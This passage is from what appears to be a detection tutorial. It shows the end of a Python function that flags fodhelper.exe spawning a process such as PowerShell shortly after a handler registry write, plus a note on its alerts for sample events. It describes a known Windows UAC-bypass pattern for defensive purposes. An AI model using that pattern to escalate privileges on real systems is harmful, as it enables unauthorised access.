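            wrote = last_write.get(ev["user"])
            if wrote and when - wrote <= WINDOW:
                alerts.append(("high", ev["user"], "fodhelper.exe spawned " + ev["image"].rsplit("\\", 1)[-1]))
    return alerts
```

On the sample data, detect(SAMPLE_EVENTS) returns two medium alerts for the handler writes and one high alert for the PowerShell child, while the Settings-launched fodhelper.exe produces nothing.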